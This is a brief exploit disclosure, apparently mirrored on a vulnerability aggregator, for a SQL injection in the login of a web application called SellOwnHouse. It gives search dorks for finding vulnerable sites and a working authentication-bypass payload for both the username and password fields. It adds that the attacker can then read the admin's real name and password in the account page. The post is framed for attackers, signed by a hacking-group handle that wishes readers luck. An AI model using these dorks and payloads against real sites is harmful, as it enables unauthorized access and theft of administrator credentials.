Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19158
HistoryFeb 16, 2008 - 12:00 a.m.

SellOwnHouse login SQL Injection

2008-02-1600:00:00
vulners.com
9

#########################################################################

SellOwnHouse login SQL Injection

#########################################################################

AUTHOR : S@BUN

HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : "2008 SellOwnHouse"

DORK 2 : "2007 SellOwnHouse"

#########################################################################

EXPLOIT :

Username: anything' OR 'x'='x

Password: anything' OR 'x'='x

later attacker can see real admin name and pass in Edit Your Account

#########################################################################

S@BUN www.hackturkiye.com S@BUN

#########################################################################

S@BUN GOOD LUCKY S@BUN

#########################################################################